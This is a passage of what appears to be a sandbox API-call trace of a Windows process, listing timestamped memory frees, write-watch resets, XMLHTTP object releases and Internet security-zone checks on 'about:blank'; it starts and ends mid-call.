(_Block=0xc13858) [0187.577] free (_Block=0xc10a70) [0187.577] free (_Block=0xc10a58) [0187.577] free (_Block=0xc13998) [0187.577] free (_Block=0xc13718) [0187.577] free (_Block=0xc109f8) [0187.577] free (_Block=0xc10a10) [0187.577] free (_Block=0xc10a28) [0187.577] free (_Block=0xc13838) [0187.577] free (_Block=0xc10b00) [0187.577] free (_Block=0xc10980) [0187.577] free (_Block=0xc149b0) [0187.577] free (_Block=0xc13738) [0187.577] free (_Block=0xc10b18) [0187.577] free (_Block=0xc10998) [0187.577] free (_Block=0xc13958) [0187.577] free (_Block=0xc13788) [0187.577] free (_Block=0xc10a40) [0187.578] free (_Block=0xc10c98) [0187.578] free (_Block=0xc13918) [0187.578] free (_Block=0xc138b8) [0187.578] free (_Block=0xc10ce0) [0187.578] free (_Block=0xc10d10) [0187.578] free (_Block=0xc138d8) [0187.578] free (_Block=0xc13778) [0187.578] free (_Block=0xc10c80) [0187.578] free (_Block=0xc10cc8) [0187.578] free (_Block=0xc10cf8) [0187.578] free (_Block=0xc137a8) [0187.578] free (_Block=0xc10c68) [0187.578] free (_Block=0xc10cb0) [0187.578] free (_Block=0xc14978) [0187.578] free (_Block=0xc13888) [0187.578] free (_Block=0xc10d28) [0187.578] free (_Block=0xc13490) [0187.578] free (_Block=0xc14ba8) [0187.578] free (_Block=0xc13768) [0187.578] free (_Block=0xc135e0) [0187.578] free (_Block=0xc13460) [0187.578] free (_Block=0xc17f98) [0187.578] free (_Block=0xc136f8) [0187.578] free (_Block=0xc13448) [0187.578] free (_Block=0xc135c8) [0187.578] free (_Block=0xc17f58) [0187.578] free (_Block=0xc13728) [0187.579] free (_Block=0xc133d0) [0187.579] free (_Block=0xc13598) [0187.579] free (_Block=0xc13478) [0187.579] free (_Block=0xc137c8) [0187.579] free (_Block=0xc134a8) [0187.579] free (_Block=0xc13580) [0187.579] free (_Block=0xc14940) [0187.579] free (_Block=0xc13758) [0187.579] free (_Block=0xc13550) [0187.579] free (_Block=0xc13538) [0187.579] free (_Block=0xc14a20) [0187.579] free (_Block=0xc17f48) [0187.579] free (_Block=0xc133a0) [0187.579] free (_Block=0xc13340) [0187.579] free (_Block=0xc148d0) [0187.579] free (_Block=0xc17f38) [0187.579] free (_Block=0xc13430) [0187.579] free (_Block=0xc13388) [0187.579] free (_Block=0xc14b00) [0187.579] free (_Block=0xc17f28) [0187.579] free (_Block=0xc133b8) [0187.579] free (_Block=0xc13418) [0187.579] free (_Block=0xc14b70) [0187.579] free (_Block=0xc17f18) [0187.579] free (_Block=0xc134c0) [0187.579] free (_Block=0xc13520) [0187.580] free (_Block=0xc14898) [0187.580] free (_Block=0xc17f08) [0187.580] free (_Block=0xc132f8) [0187.580] free (_Block=0xc13400) [0187.580] free (_Block=0xc17ec8) [0187.580] free (_Block=0xc17eb8) [0187.580] free (_Block=0xc133e8) [0187.580] free (_Block=0xc13358) [0187.580] free (_Block=0xc13508) [0187.580] free (_Block=0xc17ea8) [0187.580] free (_Block=0xc135b0) [0187.580] free (_Block=0xc13328) [0187.580] free (_Block=0xc14908) [0187.580] free (_Block=0xc17e98) [0187.580] free (_Block=0xc134f0) [0187.580] free (_Block=0xc13568) [0187.580] free (_Block=0xc17e58) [0187.580] free (_Block=0xc17e48) [0187.580] free (_Block=0xc13310) [0187.580] free (_Block=0xc134d8) [0187.580] free (_Block=0xc13370) [0187.580] free (_Block=0xc17e38) [0187.580] free (_Block=0xc13628) [0187.580] free (_Block=0xc13610) [0187.580] free (_Block=0xc14b38) [0187.580] free (_Block=0xc17e28) [0187.581] free (_Block=0xc13670) [0187.581] free (_Block=0xc135f8) [0187.581] free (_Block=0xc17de8) [0187.581] free (_Block=0xc17dd8) [0187.581] free (_Block=0xc13688) [0187.581] free (_Block=0xc13658) [0187.581] free (_Block=0xc136b8) [0187.581] free (_Block=0xc12900) [0187.581] free (_Block=0xc13640) [0187.581] free (_Block=0xc136a0) [0187.581] free (_Block=0xc14ac8) [0187.581] free (_Block=0xc128f0) [0187.581] free (_Block=0xc14428) [0187.581] free (_Block=0xc143e0) [0187.581] free (_Block=0xc17d98) [0187.581] free (_Block=0xc0b198) [0187.581] free (_Block=0xc143c8) [0187.581] free (_Block=0xc14398) [0187.581] free (_Block=0xc14338) [0187.581] free (_Block=0xc0f000) [0187.581] free (_Block=0xc12e90) [0187.581] free (_Block=0xc12dc0) [0187.581] free (_Block=0xc12e28) [0187.581] free (_Block=0xc12c88) [0187.584] free (_Block=0xc12fc8) [0187.585] free (_Block=0xc12bb8) [0187.585] free (_Block=0xc17d30) [0187.585] free (_Block=0xc17cc8) [0187.585] free (_Block=0xc17c60) [0187.585] free (_Block=0xc17bf8) [0187.585] free (_Block=0xc17b90) [0187.585] free (_Block=0xc17b28) [0187.585] free (_Block=0xc17ac0) [0187.585] free (_Block=0xc17a58) [0187.585] free (_Block=0xc179f0) [0187.585] free (_Block=0xc17988) [0187.585] free (_Block=0xc17920) [0187.585] free (_Block=0xc178b8) [0187.585] free (_Block=0xc17850) [0187.585] free (_Block=0xc177e8) [0187.585] free (_Block=0xc17780) [0187.585] free (_Block=0xc17718) [0187.585] free (_Block=0xc137b8) [0187.585] free (_Block=0xc139d8) [0187.585] free (_Block=0xc10b90) [0187.585] free (_Block=0xc10c08) [0187.586] VirtualFree (lpAddress=0x75a0000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.586] VirtualFree (lpAddress=0x7405000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.587] free (_Block=0xc0b150) [0187.587] free (_Block=0xc0b0f8) [0187.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08000 | out: lpSystemTimeAsFileTime=0xc08000*(dwLowDateTime=0x76694997, dwHighDateTime=0x1d7d80b)) [0187.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08010 | out: lpSystemTimeAsFileTime=0xc08010*(dwLowDateTime=0x76694997, dwHighDateTime=0x1d7d80b)) [0187.588] ResetWriteWatch (lpBaseAddress=0x7400000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7401000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7402000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7403000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7404000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7406000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7407000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7409000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740a000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740b000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740c000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740d000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740e000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x740f000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7410000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7411000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7412000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7413000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7414000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7415000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7417000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7418000, dwRegionSize=0x1000) returned 0x0 [0187.588] ResetWriteWatch (lpBaseAddress=0x7419000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741a000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741b000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741c000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741d000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741e000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x741f000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7580000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7581000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7582000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7583000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7584000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7585000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7586000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7587000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7588000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x758c000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x758e000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7595000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7598000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x7599000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x759a000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x759b000, dwRegionSize=0x1000) returned 0x0 [0187.589] ResetWriteWatch (lpBaseAddress=0x759c000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9535000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9536000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9537000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9538000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9539000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953a000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953b000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953c000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953d000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953e000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x953f000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9540000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9541000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9542000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9545000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9546000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9547000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9548000, dwRegionSize=0x1000) returned 0x0 [0187.590] ResetWriteWatch (lpBaseAddress=0x9549000, dwRegionSize=0x1000) returned 0x0 [0187.590] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x7669d201, dwHighDateTime=0x1d7d80b)) [0187.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x7669d201, dwHighDateTime=0x1d7d80b)) [0187.591] GetTickCount () returned 0x1d79676 [0187.591] SetEvent (hEvent=0x390) returned 1 [0187.591] SetThreadPriority (hThread=0x394, nPriority=0) returned 1 [0187.593] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x3e8) returned 0x0 [0187.593] SetThreadPriority (hThread=0x394, nPriority=-1) returned 1 [0187.594] VirtualFree (lpAddress=0x9548000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.596] free (_Block=0xc12a90) [0187.596] free (_Block=0xc12a78) [0187.596] free (_Block=0xc12a60) [0187.596] free (_Block=0xc14198) [0187.596] free (_Block=0xc14180) [0187.596] free (_Block=0xc12aa8) [0187.596] free (_Block=0xc14218) [0187.596] free (_Block=0xc14200) [0187.596] free (_Block=0xc141e8) [0187.596] free (_Block=0xc144b8) [0187.596] free (_Block=0xc143b0) [0187.596] free (_Block=0xc14268) [0187.596] free (_Block=0xc143f8) [0187.596] free (_Block=0xc14440) [0187.596] free (_Block=0xc142a8) [0187.597] free (_Block=0xc14470) [0187.597] free (_Block=0xc142d8) [0187.597] free (_Block=0xc14308) [0187.597] free (_Block=0xc14350) [0187.597] free (_Block=0xc142f0) [0187.597] free (_Block=0xc14410) [0187.597] free (_Block=0xc1a798) [0187.597] free (_Block=0xc1a558) [0187.597] free (_Block=0xc1a678) [0187.597] free (_Block=0xc1a768) [0187.597] free (_Block=0xc1a5e8) [0187.597] free (_Block=0xc1a738) [0187.597] free (_Block=0xc4d668) [0187.597] free (_Block=0xc1a588) [0187.597] free (_Block=0xc1a7b0) [0187.597] free (_Block=0xc5fc98) [0187.597] free (_Block=0xc5fc20) [0187.597] free (_Block=0xc5fcc8) [0187.597] VirtualFree (lpAddress=0x759c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.598] free (_Block=0xc14488) [0187.598] free (_Block=0xc142c0) [0187.598] free (_Block=0xc14368) [0187.598] VirtualFree (lpAddress=0x9546000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.599] VirtualFree (lpAddress=0x7595000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.600] VirtualFree (lpAddress=0x7598000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.600] VirtualFree (lpAddress=0x9549000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.601] VirtualFree (lpAddress=0x7414000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.601] VirtualFree (lpAddress=0x7584000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.602] VirtualFree (lpAddress=0x7582000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.602] VirtualFree (lpAddress=0x9542000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.603] VirtualFree (lpAddress=0x7583000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.603] VirtualFree (lpAddress=0x7599000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.604] VirtualFree (lpAddress=0x7585000, dwSize=0x2000, dwFreeType=0x4000) returned 1 [0187.604] free (_Block=0xc14c78) [0187.604] VirtualFree (lpAddress=0x7412000, dwSize=0x2000, dwFreeType=0x4000) returned 1 [0187.605] free (_Block=0xc0fbc0) [0187.605] GetTickCount () returned 0x1d79685 [0187.605] GetTickCount () returned 0x1d79685 [0187.605] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0187.606] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0187.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08028 | out: lpSystemTimeAsFileTime=0xc08028*(dwLowDateTime=0x766c1abd, dwHighDateTime=0x1d7d80b)) [0187.606] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x0 [0187.606] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x0 [0187.606] free (_Block=0xc1a6d8) [0187.606] IUnknown:Release (This=0xcf83c0) returned 0x0 [0187.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08030 | out: lpSystemTimeAsFileTime=0xc08030*(dwLowDateTime=0x766ca545, dwHighDateTime=0x1d7d80b)) [0187.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x766cb7e2, dwHighDateTime=0x1d7d80b)) [0187.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x766cb7e2, dwHighDateTime=0x1d7d80b)) [0187.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08048 | out: lpSystemTimeAsFileTime=0xc08048*(dwLowDateTime=0x766cb7e2, dwHighDateTime=0x1d7d80b)) [0187.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08050 | out: lpSystemTimeAsFileTime=0xc08050*(dwLowDateTime=0x766cb7e2, dwHighDateTime=0x1d7d80b)) [0187.610] GetUserDefaultLCID () returned 0x409 [0187.610] GetACP () returned 0x4e4 [0187.610] free (_Block=0xbffec8) [0187.610] GetCurrentThreadId () returned 0xb48 [0187.610] free (_Block=0xc14320) [0187.610] free (_Block=0xc147c0) [0187.611] free (_Block=0xbfe968) [0187.613] IUnknown:Release (This=0x5f0b00) returned 0x0 [0187.613] IUnknown:Release (This=0xd10de4) returned 0x0 [0187.613] IUnknown:Release (This=0x6e8967bc) returned 0x7fff [0187.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606f18 | out: hHeap=0x5e0000) returned 1 [0187.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63dd18 | out: hHeap=0x5e0000) returned 1 [0187.613] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x19fdf8 | out: ppURI=0x19fdf8*=0x5f59d4) returned 0x0 [0187.614] IUri:GetScheme (in: This=0x5f59d4, pdwScheme=0x19fd90 | out: pdwScheme=0x19fd90*=0x11) returned 0x0 [0187.614] IUnknown:QueryInterface (in: This=0x5f59d4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19fd88 | out: ppvObject=0x19fd88*=0x5f59d4) returned 0x0 [0187.614] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.615] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.615] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.615] IUri:IsEqual (in: This=0x609dbc, pUri=0x5f59d4, pfEqual=0x19fde0 | out: pfEqual=0x19fde0*=0) returned 0x0 [0187.615] IUnknown:Release (This=0x609dbc) returned 0x4 [0187.615] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.615] IUri:GetAbsoluteUri (in: This=0x5f59d4, pbstrAbsoluteUri=0xcf8240 | out: pbstrAbsoluteUri=0xcf8240*="about:blank") returned 0x0 [0187.615] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60be38, Size=0x1c) returned 0x60be38 [0187.616] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.616] GetCurrentProcessId () returned 0xe14 [0187.616] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6360 | out: hHeap=0x5e0000) returned 1 [0187.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60b838 | out: hHeap=0x5e0000) returned 1 [0187.617] IUnknown:Release (This=0x5f5f5c) returned 0x6 [0187.617] IUnknown:Release (This=0x5f5f5c) returned 0x5 [0187.618] GetCurrentThreadId () returned 0xb48 [0187.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609ae8 | out: hHeap=0x5e0000) returned 1 [0187.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609c38 | out: hHeap=0x5e0000) returned 1 [0187.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60be38 | out: hHeap=0x5e0000) returned 1 [0187.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60a278 | out: hHeap=0x5e0000) returned 1 [0187.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b650 | out: hHeap=0x5e0000) returned 1 [0187.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604cc8 | out: hHeap=0x5e0000) returned 1 [0187.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6270 | out: hHeap=0x5e0000) returned 1 [0187.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604e48 | out: hHeap=0x5e0000) returned 1 [0187.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63e8d0 | out: hHeap=0x5e0000) returned 1 [0187.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d28 | out: hHeap=0x5e0000) returned 1 [0187.621] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a970 | out: hHeap=0x5e0000) returned 1 [0187.621] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63f990 | out: hHeap=0x5e0000) returned 1 [0187.621] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67d210 | out: hHeap=0x5e0000) returned 1 [0187.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68dd90 | out: hHeap=0x5e0000) returned 1 [0187.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc940 | out: hHeap=0x5e0000) returned 1 [0187.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8758 | out: hHeap=0x5e0000) returned 1 [0187.622] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67d170 | out: hHeap=0x5e0000) returned 1 [0187.626] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68c630 | out: hHeap=0x5e0000) returned 1 [0187.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4) returned 0x9ee6c20 [0187.628] memcpy_s (in: _Destination=0x9ee6c20, _DestinationSize=0x4, _Source=0x19fc58, _SourceSize=0x4 | out: _Destination=0x9ee6c20) returned 0x0 [0187.628] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19fa24, dwReserved=0x0 | out: ppSM=0x19fa24*=0x6cde08) returned 0x0 [0187.629] IUnknown:QueryInterface (in: This=0x6cde08, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x19fa28 | out: ppvObject=0x19fa28*=0x6cde08) returned 0x0 [0187.629] IUnknown:Release (This=0x6cde08) returned 0x1 [0187.629] IInternetSecurityManager:SetSecuritySite (This=0x6cde08, pSite=0xd10de4) returned 0x0 [0187.629] IUnknown:AddRef (This=0xd10de4) returned 0x49 [0187.629] IUnknown:QueryInterface (in: This=0xd10de4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19fa00 | out: ppvObject=0x19fa00*=0xd10de8) returned 0x0 [0187.629] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6cde3c | out: ppvObject=0x6cde3c*=0x0) returned 0x80004002 [0187.630] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6cde38 | out: ppvObject=0x6cde38*=0x0) returned 0x80004002 [0187.630] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x6cde34 | out: ppvObject=0x6cde34*=0x0) returned 0x80004002 [0187.630] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6cde30 | out: ppvObject=0x6cde30*=0x6e8967bc) returned 0x0 [0187.630] IUnknown:Release (This=0xd10de8) returned 0x0 [0187.630] IUnknown:AddRef (This=0x6cde08) returned 0x2 [0187.630] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.630] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.630] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="about:blank", pdwZone=0x19fa78, dwFlags=0x0 | out: pdwZone=0x19fa78*=0xffffffff) returned 0x800c0011 [0187.631] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.631] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.632] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cde08, pUri=0x5f59d4, dwAction=0x2106, pPolicy=0x19fa7c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19fa5c | out: pPolicy=0x19fa7c*=0x0, pdwOutFlags=0x19fa5c*=0x0) returned 0x0 [0187.632] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x19fa7c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19fa7c*=0x0) returned 0x0 [0187.632] IUnknown:Release (This=0x6cde08) returned 0x1 [0187.632] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.633] IUnknown:Release (This=0x5f2fa0) returned 0x0 [0187.633] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0187.634] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.634] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.634] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x9f831a8 [0187.634] memcpy_s (in: _Destination=0x9f831a8, _DestinationSize=0xa, _Source=0x609b90, _SourceSize=0xa | out: _Destination=0x9f831a8) returned 0x0 [0187.634] GetCurrentProcessId () returned 0xe14 [0187.634] GetCurrentThreadId () returned 0xb48 [0187.634] GetCurrentThreadId () returned 0xb48 [0187.634] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 